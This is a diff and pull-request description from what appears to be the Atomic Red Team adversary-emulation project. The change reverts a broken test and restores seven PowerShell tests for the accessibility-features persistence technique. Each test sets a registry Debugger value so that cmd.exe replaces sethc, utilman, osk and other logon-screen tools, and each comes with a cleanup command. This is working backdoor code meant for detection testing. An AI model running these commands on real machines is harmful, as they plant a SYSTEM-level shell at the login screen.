-          -Path $registryPath -Name $name -Value $Value\n  }\n}\n"
-        cleanup_command: "$input_table = #{parent_list}  \nForeach ($item in $input_table){\n
-          \ reg delete \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image
-          File Execution Options\\$item\" /v Debugger /f\n}\n"
+        command: |
+          $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
+          $Value = "C:\windows\system32\cmd.exe"
+          $Name = "Debugger"
+          IF(!(Test-Path $registryPath))
+           {
+            New-Item -Path $registryPath -Force
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+           }
+          ELSE
+           {
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value
+           }
+        cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+          NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
+
+'
+    - name: Attaches Command Prompt As Debugger To Process - sethc
+      description: 'This allows adversaries to execute the attached process
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        target_executable:
+          description: File You Want To Attach cmd To
+          type: String
+          default: sethc.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
+          $Value = "C:\windows\system32\cmd.exe"
+          $Name = "Debugger"
+          IF(!(Test-Path $registryPath))
+           {
+            New-Item -Path $registryPath -Force
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+           }
+          ELSE
+           {
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value
+           }
+        cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+          NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
+
+'
+    - name: Attaches Command Prompt As Debugger To Process - utilman
+      description: 'This allows adversaries to execute the attached process
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        target_executable:
+          description: File You Want To Attach cmd To
+          type: String
+          default: utilman.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"
+          $Value = "C:\windows\system32\cmd.exe"
+          $Name = "Debugger"
+          IF(!(Test-Path $registryPath))
+           {
+            New-Item -Path $registryPath -Force
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+           }
+          ELSE
+           {
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value
+           }
+        cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+          NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger
+          /f
+
+'
+    - name: Attaches Command Prompt As Debugger To Process - magnify
+      description: 'This allows adversaries to execute the attached process
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        target_executable:
+          description: File You Want To Attach cmd To
+          type: String
+          default: magnify.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe"
+          $Value = "C:\windows\system32\cmd.exe"
+          $Name = "Debugger"
+          IF(!(Test-Path $registryPath))
+           {
+            New-Item -Path $registryPath -Force
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+           }
+          ELSE
+           {
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value
+           }
+        cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+          NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger
+          /f
+
+'
+    - name: Attaches Command Prompt As Debugger To Process - narrator
+      description: 'This allows adversaries to execute the attached process
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        target_executable:
+          description: File You Want To Attach cmd To
+          type: String
+          default: narrator.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe"
+          $Value = "C:\windows\system32\cmd.exe"
+          $Name = "Debugger"
+          IF(!(Test-Path $registryPath))
+           {
+            New-Item -Path $registryPath -Force
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+           }
+          ELSE
+           {
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value
+           }
+        cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+          NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger
+          /f
+
+'
+    - name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
+      description: 'This allows adversaries to execute the attached process
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        target_executable:
+          description: File You Want To Attach cmd To
+          type: String
+          default: DisplaySwitch.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe"
+          $Value = "C:\windows\system32\cmd.exe"
+          $Name = "Debugger"
+          IF(!(Test-Path $registryPath))
+           {
+            New-Item -Path $registryPath -Force
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+           }
+          ELSE
+           {
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value
+           }
+        cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+          NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger
+          /f
+
+'
+    - name: Attaches Command Prompt As Debugger To Process - AtBroker
+      description: 'This allows adversaries to execute the attached process
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        target_executable:
+          description: File You Want To Attach cmd To
+          type: String
+          default: atbroker.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe"
+          $Value = "C:\windows\system32\cmd.exe"
+          $Name = "Debugger"
+          IF(!(Test-Path $registryPath))
+           {
+            New-Item -Path $registryPath -Force | Out-Null
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+           }
+          ELSE
+           {
+            New-ItemProperty -Path $registryPath -Name $name -Value $Value
+           }
+        cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+          NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger
+          /f
+
+'
   '':
     technique:
       x_mitre_data_sources:

--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -194,7 +194,13 @@
 - [T1134 Access Token Manipulation](./T1134/T1134.md)
   - Atomic Test #1: Access Token Manipulation [windows]
 - [T1015 Accessibility Features](./T1015/T1015.md)
-  - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
+  - Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows]
+  - Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows]
+  - Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows]
+  - Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows]
+  - Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows]
+  - Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows]
+  - Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows]
 - T1182 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1103 AppInit DLLs](./T1103/T1103.md)
   - Atomic Test #1: Install AppInit Shim [windows]
@@ -248,7 +254,13 @@
 
 # persistence
 - [T1015 Accessibility Features](./T1015/T1015.md)
-  - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
+  - Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows]
+  - Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows]
+  - Atomic Test #3: Attaches Command Prompt As Debugger To Process - utilman [windows]
+  - Atomic Test #4: Attaches Command Prompt As Debugger To Process - magnify [windows]
+  - Atomic Test #5: Attaches Command Prompt As Debugger To Process - narrator [windows]
+  - Atomic Test #6: Attaches Command Prompt As Debugger To Process - DisplaySwitch [windows]
+  - Atomic Test #7: Attaches Command Prompt As Debugger To Process - AtBroker [windows]
 - [T1098 Account Manipulation](./T1098/T1098.md)
   - Atomic Test #1: Admin Account Manipulate [windows]
 - T1182 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)


### PR DESCRIPTION
Reverts redcanaryco/atomic-red-team#808

When running this new test, it causes "The process tried to write to a nonexistent pipe" error

![image](https://user-images.githubusercontent.com/22311332/73313981-f01f7400-41e9-11ea-804e-1dd6bbd81151.png)

I can fix the immediate issue by putting quotes around the parent_list, but this won't work when more than one item is passed in the list. Also, it results in the following additional error. 
![image](https://user-images.githubusercontent.com/22311332/73314109-3248b580-41ea-11ea-8f1b-576421ad49da.png)
